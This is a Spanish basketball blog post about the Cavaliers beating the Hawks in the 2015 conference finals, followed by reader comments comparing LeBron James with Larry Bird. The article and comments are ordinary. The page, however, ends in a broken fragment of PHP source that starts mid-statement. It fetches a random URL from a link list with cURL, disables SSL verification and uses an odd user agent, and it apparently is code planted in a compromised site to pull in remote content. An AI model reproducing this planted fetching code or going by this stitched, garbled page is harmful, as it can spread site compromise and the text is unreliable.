La Crónica: Lebron lleva a los Cavs de vuelta a la tierra prometida

27 de May de 2015 por txusma

Ya lo decíamos al final de la crónica del tercer partido: “Nos vamos al 4º partido. Lebron debería hacer el último esfuerzo titánico y cerrar la serie”. Dicho y hecho. Con la participación esta vez de Kyrie Irving, en apenas 3 minutos quedó claro que la victoria no volaría de Cleveland. Los Hawks saltaron a la cancha como ovejas camino del matadero y en ningún momento dieron la sensación de poder (ni querer) competir. Con Irving recuperando sensaciones, Lebron James gustándose, Tristan Thompson cogiendo rebotes como un loco, JR Smith anotando desde fuera, etc. los puntos fueron cayendo a favor de los locales y la diferencia fue aumentando poco a poco hasta llegar a los sonrojantes 30 puntos que muestran el marcador final. Queda toda dicho señalando que los últimos 12 minutos del partido fueron todos de la basura. 

Con esta victoria, los Cleveland alcanzan por segunda vez en su historia las finales, ambas de la mano de su hijo pródigo, Lebron James. Para “The King” serán las quintas consecutivas algo que no se veía en la liga desde los tiempos de los Celtics de Bill Russell y de eso hace ya 50 años. Los Hawks ponen punto y final a una temporada que por momentos fue de ensueño y que ha acabado resultando casi una pesadilla. Cierto es que las lesiones también les han golpeado fuerte pero en muy pocos momentos de estos playoffs hemos visto a aquel equipo que nos maravilló a todos en enero cuando encadenaron 19 victorias consecutivas. Y llegadas las finales de conferencia les ha afectado en demasía el mal de altura y enfrentarse a un depredador en su habitat natural como Lebron. Su último partido ha resultado un broche cruel a una gran temporada pero no deberían abandonar, todos agradeceremos que la próxima temporada insistan con la misma idea.

Comenta

21 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Dellavedova… tras lo de Gibson y la lesión a Korver, quiso terminar de lesionar a Carroll y lanzar un codazo a Horford

    Vaya telita

    En la tercera toma, la que es de frente, se percibe claramente como ve a Carroll en el suelo y como suelta codazo en la ingle a Horford

    https://streamable.com/y46n

    Tendrá un nombre muy chulo que os gustará, pero este jugador es bastante sucio

      Citar

  2. Ruxixón dice:
    #2

    Al menos 1 día extra de descanso respecto a Golden State,aunque nunca se sabe si es beneficioso o no.A mimar a Irving todo lo que se pueda para la madre de las batallas.La verdad es que el equipo está en un punto de forma -lesiones al margen- espectacular. Y mucho mérito para lo hecho por LeBron,pero las resurgidas comparaciones con Jordan me parecen demasiado.

    Por los Hawks el miedo que se puedan caer piezas del equipo,no tengo muy claro que Carroll,con posibilidades de firmar por un equipo de relumbrón,o Millsap vaya a continuar sus carreras en Atlanta.A ver qué es lo que hacen este verano pero ahí queda escrito este año cuando no nadie daba un duro por la franquicia.Bravo por ellos.

      Citar

  3. Jose Luis dice:
    #3

    Muy de acuerdo contigo

    Este año ha sido muy bueno para ellos.

    Ahora bien, dudo que Carroll y Millsap sigan, la verdad.

      Citar

  4. charlestone dice:
    #4

    Año sensacional y sorprendente el de Atlanta. Sin embargo, desgraciadamente se veía desde hace tiempo (e incluso, si me apuras, cuando estaban a tope) que en los Playoffs lo iban a tener difícil. Lebron, Chicago a pesar de los pesares me parecían huesos duros de roer y ya con las lesiones y tal…más complicado. Así que año perfecto para ellos. Nunca me han gustado los Hawks por lo que dudo ser imparcial…algún día tendrán que responder a las expectativas y no entrar en playoffs…yo en la porra los volveré a poner fuera..jejeje. Eso sí, imposible hacer tanto con tan poco…los Pacers del año pasado hasta que se les fue la cabeza para mí sí que eran contenders, estos no.

      Citar

  5. Josgel dice:
    #5

    Pues para mi la pieza sobre la que se basan los Hawks es el entrenador. Creo que sus sistemas hacen mejores a los jugadores y sinó repasemos trayectorias individuales; Carroll, Korver, Teague, Bazemore, Sefolosha, Antic, Mack, Scott, Shroeder, etc. Solo se salvan quizás Horford y Milsap que ya venían en una línea regular. Dudo mucho que los primeros en otros equipos diesen el mismo rendimiento. Por eso y como seguidor Hawk desde los tiempos de Dominique no me importan demasiado lo que hagan con los expirings y sí que le den buenos mimbres a desarrollar al coach.

      Citar

  6. Jose Luis dice:
    #6

    Obviamente, los jugadores son jugadores en estos sistemas. Eso cada vez se ve más en la liga.

    No obstante a mi hay varios jugadores que me gustan y son de rol. Korver, Bazemore, Scott, incluso Carroll, creo que mas o menos encajarían en cualquier equipo, y Sefolosha igual.

      Citar

  7. Viva_Dirk dice:
    #7

    Las comparaciones con Jordan siguen quedando muy lejos, pero Lebron llama a la puerta del olimpo hace tiempo, cada vez quedan menos a los que no pueda discutir.

      Citar

  8. Nacho dice:
    #8

    Viva_Dirk:
    Las comparaciones con Jordan siguen quedando muy lejos, pero Lebron llama a la puerta del olimpo hace tiempo, cada vez quedan menos a los que no pueda discutir.

    Supongo que en el Olimpo ya está. Y yo soy uno de sus afamados ‘haters’. Que es un jugador descomunal está fuera de toda duda. Que aquel gilipollas que empezó siendo ya no lo es, también. Ha descubierto que el basket es un juego de equipo y que necesita al equipo, y eso, curiosamente, lo hace mejor individualmente. Es una fuerza de la naturaleza. Cuando lo veo siempre termino diciendo, ¡Qué bueno es! Pero para mí el deporte, aparte de competición es belleza, es danza, organicidad… que sé yo… y el muchacho a mí no me transmite.
    Pero, vamos, en el Olimpo está, y quien no lo considere uno de los más grandes de la historia, tiene un problema.

      Citar

  9. Triceratops dice:
    #9

    Nacho: Supongo que en el Olimpo ya está. Y yo soy uno de sus afamados ‘haters’. Que es un jugador descomunal está fuera de toda duda. Que aquel gilipollas que empezó siendo ya no lo es, también. Ha descubierto que el basket es un juego de equipo y que necesita al equipo, y eso, curiosamente, lo hace mejor individualmente. Es una fuerza de la naturaleza. Cuando lo veo siempre termino diciendo, ¡Qué bueno es! Pero para mí el deporte, aparte de competición es belleza, es danza, organicidad… que sé yo… y el muchacho a mí no me transmite.
    Pero, vamos, en el Olimpo está, y quien no lo considere uno de los más grandes de la historia, tiene un problema.

    Pues debo tener un problema, porque para mi claramente, Lebron es el mejor alero de la historia.

    El problema, al igual que pasa en otras artes como la música ó incluso el cine, es que la gente toma la costumbre de mitificar y encumbrar el pasado , y despreciar y putear lo presente. Para mi Lebron ya está muy por encima de Bird, de Erving, ni digamos de Pippen ó en definitiva, de quien considereis el mejor alero de la historia.

      Citar

  10. txusma dice:
    #10

    Mira a la cara a Larry Bird pero claramente por encima… Sólo hace falta revisar los números del de los Celtics para darse cuenta de era un jugador descomunal. Están a la par que los de Lebron en una liga mucha más competitiva que la que tenemos ahora, ojo.

    De todas maneras lo de Lebron es la leche. Tiene el cuerpo prácticamente de Al Horford y se mueve y tiene la visión de un base. Es tremendo.

      Citar

  11. Ruxixón dice:
    #11

    Mira que Bird tiene -o tenía- todas las papeletas para caer mal a todo el mundo,por su carácter,pero ese mismo carácter lo ha colocado ahí arriba,en ese olimpo de los elegidos.13 años y una media de 24.3 puntos,10 rebotes y 6.3 asistencias,y números similares en su bagaje en PO.Dios me libre de profesar un amor incondicional por los Celtics y su historia,pero el legado del 33 céltico es enorme.

    No sé quién dijo (JR Smith??) que con 2 anillos más LeBron podía discutir el nº1 a Jordan.Yo que soy proLeBron a tope,ya lo sabéis,no creo que llegue el día que los ponga al mismo nivel,pero desde luego entra en batalla con cualquier otro.Yo digo que con 1 anillo más ya puede dejar ligeramente atrás a Bird,merced a la progresión de batir unas cuantas marcas históricas en la NBA y a sus 4 MVP’s.3 anillos y 2 subcampeonatos para Larry y LeBron,sin contar esta temporada,2 anillos y 3 veces finalista.

      Citar

  12. Triceratops dice:
    #12

    Lebron tiene 30 años y medio. Si consiguiera mantener el nivel actual los proximos 4 años, y coronara su carrera con algún anillo más, creo que los escepticos deberían quitarse sus fobias y reconocer que sería el mejor alero de la historia. Para mi ya lo es, salvo que se le vaya la pinza y a partir del año que viene su carrera fuese cuesta abajo en plan Iverson post Nuggets.

    Txusma, lo de que Bird jugaba en una liga mas competitiva, ¿por que lo dices?, Si es porque Lebron ha jugado y ganado anillos junto a 2 All Stars, debo recordar que Bird no jugaba al lado de mataos precisamente…Parish, McHale, ó Dennis Johnson y Ainge entre otros…

      Citar

  13. Nacho dice:
    #13

    Triceratops: Pues debo tener un problema, porque para mi claramente, Lebron es el mejor alero de la historia.

    El problema, al igual que pasa en otras artes como la música ó incluso el cine, es que la gente toma la costumbre de mitificar y encumbrar el pasado , y despreciar y putear lo presente. Para mi Lebron ya está muy por encima de Bird, de Erving, ni digamos de Pippen ó en definitiva, de quien considereis el mejor alero de la historia.

    No me cites a mí como si yo estuviese en contra, Denise (mola más que lo del velociraptor), que una cosa es que no me caiga muy bien y que estéticamente no sea mi debilidad, pero que es la hostia ya lo digo yo por delante.

    @Txusma, las leyendas son leyendas porque la historia ha pasado por ellas. Léase Bird. Cuando LeBron cuelgue las botas pasará a ser leyenda, y esas odiosas comparaciones empezarán a tener más sentido. Y si lo hace en junio, incluso tras perder las finales, se podrán poner los dos frente a frente, y relatarse si quieren el previo a la apuesta de Don Juan y Don Luis, y no sabríamos quien es cada uno.

      Citar

  14. Triceratops dice:
    #14

    Nacho: No me cites a mí como si yo estuviese en contra, Denise (mola más que lo del velociraptor), que una cosa es que no me caiga muy bien y que estéticamente no sea mi debilidad, pero que es la hostia ya lo digo yo por delante.

    @Txusma, las leyendas son leyendas porque la historia ha pasado por ellas. Léase Bird. Cuando LeBron cuelgue las botas pasará a ser leyenda, y esas odiosas comparaciones empezarán a tener más sentido. Y si lo hace en junio, incluso tras perder las finales, se podrán poner los dos frente a frente, y relatarse si quieren el previo a la apuesta de Don Juan y Don Luis, y no sabríamos quien es cada uno.

    Me equivoque al leer, y entendi que decias que tiene un problema quien considere a Lebron un grande de la historia.
    Usted perdone…

      Citar

  15. TheDeerHunter dice:
    #15

    Triceratops:
    Lebron tiene 30 años y medio. Si consiguiera mantener el nivel actual los proximos 4 años, y coronara su carrera con algún anillo más, creo que los escepticos deberían quitarse sus fobias y reconocer que sería el mejor alero de la historia. Para mi ya lo es, salvo que se le vaya la pinza y a partir del año que viene su carrera fuese cuesta abajo en plan Iverson post Nuggets.

    Txusma, lo de que Bird jugaba en una liga mas competitiva, ¿por que lo dices?, Si es porque Lebron ha jugado y ganado anillos junto a 2 All Stars, debo recordar que Bird no jugaba al lado de mataos precisamente…Parish, McHale, ó Dennis Johnson y Ainge entre otros…

    Quizá lo dice porque tuvo que lidiar con los Lakers del Showtime, los Badboys o el propio Jordan, entre otros.

    No caigamos en el victimismo de hablar de filias o fobias en este tema. Podríamos pensar que la fobia la padeces con respecto a Larry Bird, que aguanta sobradamente la comparación.Comprendo que cuesta creerlo pero es así.
    Ahora, el pájaro ya hizo su carrera y LeBron lleva una trayectoria prodigiosa. Con alta probabilidad va a ser el mejor alero de todos los tiempos pero la realidad es que ahora mismo, si se lanza tal afirmación es perfectamente natural que alguien la ponga en duda.
    Disfrutemos de LeBron… pero yo recomendaría de vez en cuando revisar algunas de las hazañas de Bird para contextualizar. En la era de internet hay material a raudales. No estamos hablando de Mikan, por ejemplo. Merece mucho la pena.

      Citar

  16. Romino dice:
    #16

    Colocar a Lebron a la altura de Bird es ya posible…si te gusta más uno u otro, es eso, cuestión de gustos. Lebron pase lo que pase está ya en el Olimpo, aunque se pegue cinco años sin hacer nada (que no creo que lo vaya a hacer). Durant es el que todavía tiene que demostrar o ganar mucho para ganarse un puesto o ser uno de esos pocos que iban para dominar una época la nba y se quedaron a medio camino

      Citar

  17. Triceratops dice:
    #17

    TheDeerHunter: Quizá lo dice porque tuvo que lidiar con los Lakers del Showtime, los Badboys o el propio Jordan, entre otros.

    No caigamos en el victimismo de hablar de filias o fobias en este tema. Podríamos pensar que la fobia la padeces con respecto a Larry Bird, que aguanta sobradamente la comparación.Comprendo que cuesta creerlo pero es así.
    Ahora, el pájaro ya hizo su carrera y LeBron lleva una trayectoria prodigiosa. Con alta probabilidad va a ser el mejor alero de todos los tiempos pero la realidad es que ahora mismo, si se lanza tal afirmación es perfectamente natural que alguien la ponga en duda.
    Disfrutemos de LeBron… pero yo recomendaría de vez en cuando revisar algunas de las hazañas de Bird para contextualizar. En la era de internet hay material a raudales. No estamos hablando de Mikan, por ejemplo. Merece mucho la pena.

    Con Lebron hay muchas fobias porque tiene por ahí miles de haters que son incapaces de reconocer su mérito. Larry Bird nunca ha tenido tal cantidad de haters.

    Lebron ha tenido que enfrentarse el solo a los Pistons de 2007 que eran un equipazo y despues hizo lo que pudo totalmente solo con los Spurs de Popovych . Y digo solo, porque aquellos Cavs de la 06-07 a los que Lebron puso en la final, eran una autentica broma de mal gusto.
    Despues con algo mas de compañia se ha vuelto a encontrar con los legendarios Spurs de Popovych, y entre medias se ha batido contra unos OKC con Durant, Westbrook, Harden e Ibaka, al Big 3 de Boston y a unos extraordinarios Pacers de 2013. Por no hablar que este año se ha comido el solo a los Bulls y a los Hawks.

      Citar

  18. Nacho dice:
    #18

    Yo soy un Hater de ambos. No tragué al rubio de joven, cuando con ese cuerpo mierda enchufaba casi todas y le ganaba a los lakers que me flipaban, en aquellos años en los que llegaban partidos a raros horarios y de vez en cuando, y jugábamos al basket con la spectrum. No me cae bien LeBron, y no me gusta su juego (ahora con los años las filias y las fobias son más llevaderas. Y mi caso no es aislado. Mucha gente odió al pájaro como odia al de los Cav’s. Tanto monta monta tanto. Es posible venerar a uno sin desmerecer al otro. Nunca me gustaron, pero eso no significa que sean de los mejores de la historia.

      Citar

  19. Triceratops dice:
    #19

    Nacho:
    Yo soy un Hater de ambos. No tragué al rubio de joven, cuando con ese cuerpo mierda enchufaba casi todas y le ganaba a los lakers que me flipaban, en aquellos años en los que llegaban partidos a raros horarios y de vez en cuando, y jugábamos al basket con la spectrum. No me cae bien LeBron, y no me gusta su juego (ahora con los años las filias y las fobias son más llevaderas.Y mi caso no es aislado. Mucha gente odió al pájaro como odia al de los Cav’s. Tanto monta monta tanto. Es posible venerar a uno sin desmerecer al otro. Nunca me gustaron, pero eso no significa que sean de los mejores de la historia.

    Eso de que cada vez daban partidos, o no podias ver las estadisticas ó solo un pequeño resumen, ó directamente no veias nada y te enterabas de lo que pasaba en la NBA por bocas de otros, es lo que le ha dado a estos jugadores de los años 70-80 ese halo mistico de dioses. Hoy en dia, con las nuevas tecnologias, podemos ver hasta el color de calzoncillos que Lebron usa cada dia, y eso, aunque inconscientemente, creo que hace no valorar el presente y mitificar el pasado. Esa es mi opinión, al menos.

      Citar

  20. Txusma dice:
    #20

    Triceratops:
    Txusma, lo de que Bird jugaba en una liga mas competitiva, ¿por que lo dices?, Si es porque Lebron ha jugado y ganado anillos junto a 2 All Stars, debo recordar que Bird no jugaba al lado de mataos precisamente…Parish, McHale, ó Dennis Johnson y Ainge entre otros…

    Lo digo por simple aritmérica. Aquella NBA era de 22 equipos por los que los equipos eran de media mucho mejores de lo que son ahora.
    Además, y q conste en acta que a mi Lebron me flipa, llevamos años diciendo que el Este da pena y es en el Este donde Lebron ha jugado toda su carrera. Esto debe de haber comportado un menor desgaste en la regular y en muchas ocasiones una primera ronda de playoffs mucho más cómoda que las del Oeste.

      Citar

  21. charlestone dice:
    #21

    Creo que estamos en las mismas…yo estoy de acuerdo con Txusma sobre la NBA de Bird y lo que es el Este pero el tiempo se olvidarán estos aspectos y pondrá a Lebron en su lugar como leyenda y uno de los dominadores de principios XXI con O´neal, Duncan y Bryant. Se extienden, enlazan o se solapan trayectorias en su prime y se superan unos a otros pero, para mí, son los únicos cuyos nombres están en letras de oro. Cada época tiene sus reyes y pocos son los elegidos para estar entre los mejores de la historia. Lebron y Bird, dos de ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>